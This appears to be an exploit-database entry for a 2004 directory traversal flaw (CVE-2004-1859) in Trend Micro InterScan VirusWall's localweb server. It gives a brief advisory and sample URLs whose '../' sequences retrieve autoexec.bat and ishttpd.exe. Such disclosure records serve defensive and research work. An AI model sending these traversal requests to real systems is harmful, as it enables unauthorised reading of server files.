[] NeoSense

Trend Micro Interscan VirusWall localweb - Directory Traversal

Author: Tri Huynh
type: webapps
platform: windows
port: 
date_added: 2004-03-24 
date_updated: 2017-07-19 
verified: 1 
codes: CVE-2004-1859;OSVDB-4549 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/9966/info

It has been reported that InterScan VirusWall may to a directory traversal vulnerability that may allow an attacker to request files from the '/ishttp/localweb' directory and any sub directories of 'localweb' with directory traversal strings such as '../'.

http://www.example.com/ishttpd/localweb/filename
http://www.example.com/ishttpd/localweb/java/?/../../../../../../../../autoexec.bat
http://www.example.com/ishttpd/localweb/java/?/../../../ishttpd.exe